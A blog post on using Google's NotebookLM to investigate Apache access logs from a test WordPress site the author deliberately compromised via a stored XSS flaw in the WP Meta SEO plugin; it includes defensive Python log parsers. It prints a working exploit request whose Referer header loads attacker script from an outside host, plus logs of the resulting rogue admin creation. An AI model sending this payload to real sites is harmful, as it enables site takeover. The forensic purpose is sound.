Analyzing WordPress Hack Access Logs With NotebookLM

Intro to NotebookLM

One of the tools that I discovered recently and keep using more and more every day is NotebookLM from Google Labs. NotebookLM is a great tool for learning new topics, researching large amounts of data, and summarizing data. The data is organized into notebooks, and each notebook can contain multiple sources of data. You can upload data in various formats (web URLs, Slides, PDFs, text files, audio data, YouTube videos, …) and then use the tool to analyze them.

I usually use it to ask questions about the data, summarize the data, and/or extract pieces of information. The most useful feature for me is that when you ask a question it provides an answer with numbered links to the sources, so you can double-check whether the answer is correct.

Here, I’m opening the notebook Introduction to NotebookLM and asking the question What’s the maximum number of words a notebook can contain? You can see that it answered with a link to the paragraph that lists the Source limitations. (Each source can contain up to 500,000 words.)

That’s very helpful if you want to verify whether the answer you’ve received is grounded in truth.

A WordPress hack

A few days ago I had the idea of trying to see if it’s possible to analyze WordPress logs with NotebookLM (or with LLMs in general). That happened after a friend’s blog was hacked and I spent a lot of time looking at the logs trying to make sense of them. I was thinking: there must be an easier way to do this, since LLMs are great at analyzing structured data.

So, I set up a test WordPress blog and made it public on the internet for a few days to collect some background internet noise in the logs (to make it as realistic as possible). Then I hacked my test blog with the exploit my friend’s blog was hacked with (to reproduce the situation). The exploit is CVE-2023-6961, and it’s related to the WordPress plugin WP Meta SEO. The exploit is well described in this blog post from Fastly.

It is a stored XSS vulnerability via the Referer header: you send an HTTP request with an XSS payload in the Referer header.

GET /index.php/2024/10/20/973498739847943/ HTTP/1.1
Referer: <script src="https://media.cdnstaticjs.com/?payload=873933"></script>
Host: weblog.thx.bz
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Connection: close
Cache-Control: max-age=0

When the administrator logs into the WP Admin dashboard and visits the WP Meta SEO 404 & Redirects page, the XSS payload gets executed. For the payload I’ve used some JS code that creates a new WP admin user, similar to what happened in my friend’s case.

If you are interested in seeing the actual logs that I’ve uploaded into NotebookLM, you can find them in this Kaggle dataset.

Great, now we have the WordPress Hack Apache Access logs. Let’s load them into NotebookLM and see what we can do with them.

What I’ve uploaded to NotebookLM is a file named apache_access_log.txt (since it only accepts text files) that contains 1076 lines of access logs logged over 3 days. It’s possible to upload much more data: the Gemini 1.5 Pro model used by NotebookLM supports a context window of up to 2 million tokens.

178.215.238.68 - - [19/Oct/2024:00:03:17 +0000] "GET /login.rsp HTTP/1.1" 404 453 "-" "Hello World"
167.99.55.110 - - [19/Oct/2024:00:13:56 +0000] "POST /wp-cron.php?doing_wp_cron=1729469636.1745829582214355468750 HTTP/1.1" 200 259 "-" "WordPress/6.6.1; http://weblog.thx.bz"
143.110.222.166 - - [19/Oct/2024:00:13:55 +0000] "GET / HTTP/1.1" 200 15340 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1"
162.158.154.86 - - [19/Oct/2024:01:03:12 +0000] "GET /wp-includes/certificates/plugins.php HTTP/1.1" 404 490 "-" "-"
172.70.115.200 - - [19/Oct/2024:01:03:12 +0000] "GET /wp-admin/user/plugins.php HTTP/1.1" 404 490 "-" "-"
172.70.230.7 - - [19/Oct/2024:01:03:12 +0000] "GET /.well-known/acme-challenge/plugins.php HTTP/1.1" 404 490 "-" "-"
172.70.230.7 - - [19/Oct/2024:01:03:12 +0000] "GET /.well-known/acme-challenge/plugins.php HTTP/1.1" 404 490 "-" "-"
162.158.158.139 - - [19/Oct/2024:01:03:12 +0000] "GET /wp-includes/customize/plugins.php HTTP/1.1" 404 490 "-" "-"
172.70.115.200 - - [19/Oct/2024:01:03:12 +0000] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 404 489 "-" "-"
162.158.154.86 - - [19/Oct/2024:01:03:12 +0000] "GET /wp-admin/css/colors/blue/plugins.php HTTP/1.1" 404 489 "-" "-"
…
1076 lines of logs
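For readers who want to cross-check NotebookLM’s answers by hand, the entries above can be split into fields with a small parser. This is only a sketch: it assumes the file uses Apache’s "combined" log format with plain ASCII quotes, and the names LOG_PATTERN, LogEntry, and parse_line are made up for this illustration.

```python
import re
from typing import NamedTuple, Optional

# A quoted field may contain backslash-escaped characters (for example \").
_QUOTED = r'(?:[^"\\]|\\.)*'

# Assumed layout: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_PATTERN = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    + r'"(?P<request>' + _QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    + r'"(?P<referer>' + _QUOTED + r')" "(?P<agent>' + _QUOTED + r')"$'
)


class LogEntry(NamedTuple):
    ip: str
    time: str
    method: str
    path: str
    status: int
    referer: str
    agent: str


def parse_line(line: str) -> Optional[LogEntry]:
    """Return the parsed entry, or None if the line does not match the layout."""
    match = LOG_PATTERN.match(line.strip())
    if match is None:
        return None
    # The request field normally looks like "METHOD PATH PROTOCOL".
    parts = match.group("request").split(" ")
    method = parts[0]
    path = parts[1] if len(parts) > 1 else ""
    return LogEntry(
        ip=match.group("ip"),
        time=match.group("time"),
        method=method,
        path=path,
        status=int(match.group("status")),
        referer=match.group("referer"),
        agent=match.group("agent"),
    )
```

Lines that do not fit the assumed layout come back as None, so they can be counted and inspected separately instead of being silently dropped.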

Analyze WordPress logs with NotebookLM

Now that we have the logs uploaded into NotebookLM, let’s try to analyze the data. Let’s start with an “easy” question.

What’s the IP address of the WordPress administrator?

I’m asking what the IP address of the WordPress administrator is to see if NotebookLM can understand the data and extract some information from it:

Great answer, not only because it correctly determined the IP address of the WP admin (80.97.26.93), but also because it was able to figure out that the user initially logged in from another IP (138.199.53.226) and then switched to the final one (80.97.26.93).

That’s pretty impressive. I was curious to know how it knew to correlate these two IP addresses.

So, I asked next:

How do you know that these 2 IP addresses (80.97.26.93 and 138.199.53.226) belong to the same user?

Again a great answer: it noticed the Identical User Agent and Sequential Activity. That’s pretty useful already. Let’s ask more complicated questions to try to identify which HTTP requests could be related to the creation of a new WP Admin account (this is what we know happened in my friend’s case: a new WP user was created).
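The same user-agent correlation can be approximated outside NotebookLM. The sketch below is a rough heuristic, not a description of how NotebookLM reasons: it assumes the log has already been parsed into (ip, path, status, agent) tuples, treats a 200 response under /wp-admin/ as a sign of a logged-in session, and reports user agents that appear with more than one IP address. The function name shared_agent_ips is hypothetical.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# Assumed input shape: (ip, path, status, user_agent)
Entry = Tuple[str, str, int, str]


def shared_agent_ips(entries: Iterable[Entry]) -> Dict[str, List[str]]:
    """Map each user agent to the IPs (in first-seen order) that loaded
    /wp-admin/ pages successfully, keeping only agents seen from 2+ IPs."""
    ips_per_agent: Dict[str, List[str]] = defaultdict(list)
    for ip, path, status, agent in entries:
        if not path.startswith("/wp-admin/") or status != 200:
            continue  # scanners probing /wp-admin/ typically get 404 or a redirect
        if ip not in ips_per_agent[agent]:
            ips_per_agent[agent].append(ip)
    return {agent: ips for agent, ips in ips_per_agent.items() if len(ips) > 1}
```

A shared user agent alone is weak evidence, since common browsers produce identical strings, so any match should still be checked against the timestamps, as NotebookLM did with the sequential activity.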

List all the IP addresses and logs that generated HTTP requests that could have resulted in a new WP admin user creation

Interesting. It found that our own WP admin IP address was used to try to create a new WP admin user. This is quite interesting, as it hints at a stored XSS vulnerability.

The most obvious way our own IP address could be used to create a new admin user is if we visited an administrative page where attacker JS code was injected, and our own user (from our own IP address) executed the attacker’s injected code.

Let’s ask a more complicated question, trying to pinpoint the WP plugin that was involved in the exploit.

What WP plugin could have been exploited to create a new WP admin user?

I’ve also added the following additional information to the question to help the LLM answer it (as we already know which WP plugins we have installed):

What WP plugin could have been exploited to create a new WP admin user?
Take into account the following known facts:
The following WordPress plugins are installed in my WordPress installation:
<wordpress_plugins_installed>
akismet
wp-fail2ban
wp-meta-seo
hello.php
</wordpress_plugins_installed>

I’ve basically asked it to identify the WP plugin that could have been used to create a new WP admin user and provided a list of installed WP plugins.

Wow, it was able to identify the vulnerable WP plugin (WP Meta SEO) that was used during the exploit. Not only that, but it was also able to identify the WP Meta SEO admin page where the exploit occurred.

The answer contains the following section:

These attempts originated from pages related to the WP Meta SEO plugin, specifically the “metaseo_broken_link” page

metaseo_broken_link is the vulnerable page where the XSS payload executed.

It quoted the following logs:

80.97.26.93 - - [21/Oct/2024:08:15:49 +0000] "GET /wp-admin/user-new.php HTTP/1.1" 200 10927 "http://weblog.thx.bz/wp-admin/admin.php?page=metaseo_broken_link" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
80.97.26.93 - - [21/Oct/2024:08:15:49 +0000] "POST /wp-admin/user-new.php HTTP/1.1" 302 459 "http://weblog.thx.bz/wp-admin/admin.php?page=metaseo_broken_link" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
80.97.26.93 - - [21/Oct/2024:08:15:49 +0000] "GET /wp-admin/users.php?update=add&id=2 HTTP/1.1" 200 12205 "http://weblog.thx.bz/wp-admin/admin.php?page=metaseo_broken_link" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"

That’s great. We see a POST /wp-admin/user-new.php that results in a 302 redirect (which here indicates success) and has a Referer of http://weblog.thx.bz/wp-admin/admin.php?page=metaseo_broken_link. Then, from GET /wp-admin/users.php?update=add&id=2, we know that the newly created WP user has id=2 (that’s correct). metaseo_broken_link is clearly the culprit.
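The pattern described here (a POST to /wp-admin/user-new.php answered with a 302) is easy to search for directly. The following is a minimal sketch that assumes raw lines in Apache’s combined format with ASCII quotes, and assumes that a 302 on this endpoint means the user was created. The names USER_CREATE and find_user_creations are invented for this example.

```python
import re
from typing import Iterable, List, Tuple

# Matches: ip ident user [time] "POST /wp-admin/user-new.php ..." status bytes "referer"
USER_CREATE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"POST /wp-admin/user-new\.php[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)"'
)


def find_user_creations(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (ip, time, referer) for every POST to user-new.php that got a 302."""
    hits = []
    for line in lines:
        match = USER_CREATE.match(line)
        if match and match.group("status") == "302":
            hits.append((match.group("ip"), match.group("time"), match.group("referer")))
    return hits
```

The Referer in each hit is the interesting part: a legitimate user creation would normally come from the user-new.php form itself, not from a plugin page such as metaseo_broken_link.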

Let’s ask one more question:

Please list all the log entries where the Referrer header contains HTML code

It correctly identified the request that I used to inject the XSS payload that exploited the stored XSS vulnerability.
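A similar check can be scripted as a sanity test of that answer. This sketch assumes combined-format lines in which Apache has written any double quote inside a header value as \", and it uses a deliberately simple "looks like an HTML tag" pattern. REFERER_FIELD, HTML_TAG, and referers_with_html are hypothetical names.

```python
import re
from typing import Iterable, List

_QUOTED = r'(?:[^"\\]|\\.)*'

# "request" status bytes "referer" "user-agent" at the end of the line
REFERER_FIELD = re.compile(
    r'"' + _QUOTED + r'" \d{3} \S+ "(?P<referer>' + _QUOTED + r')" "' + _QUOTED + r'"$'
)

# Anything shaped like <tag ...> or </tag>; crude, but enough to flag markup.
HTML_TAG = re.compile(r'<\s*/?\s*[a-zA-Z][^>]*>')


def referers_with_html(lines: Iterable[str]) -> List[str]:
    """Return the log lines whose Referer field contains something tag-like."""
    hits = []
    for line in lines:
        line = line.rstrip("\n")
        match = REFERER_FIELD.search(line)
        if match and HTML_TAG.search(match.group("referer")):
            hits.append(line)
    return hits
```

A regular Referer is a URL and should never contain angle brackets, so even this crude test should produce few false positives on access logs.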

As you can see, using NotebookLM helped us quickly get an idea of how the WordPress blog was compromised and which plugin was probably vulnerable. Of course, it doesn’t work as well every time, but it can still save a lot of time.

If you are interested in the patch for this vulnerability, it’s available here (the Referer header is HTML encoded).
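To illustrate why HTML encoding neutralizes the payload, here is the same idea in Python. This is not the plugin’s code (the plugin is written in PHP, and its patch is not reproduced here); it only shows the effect of encoding on the Referer value from the request above. The function name encode_referer is made up.

```python
import html


def encode_referer(referer: str) -> str:
    """HTML-encode a Referer value before it is stored or rendered in a page."""
    # quote=True also encodes double and single quotes, which matters when
    # the value ends up inside an HTML attribute.
    return html.escape(referer, quote=True)


payload = '<script src="https://media.cdnstaticjs.com/?payload=873933"></script>'
print(encode_referer(payload))
# prints: &lt;script src=&quot;https://media.cdnstaticjs.com/?payload=873933&quot;&gt;&lt;/script&gt;
```

Once encoded, the browser renders the value as text on the admin page instead of executing it as a script tag.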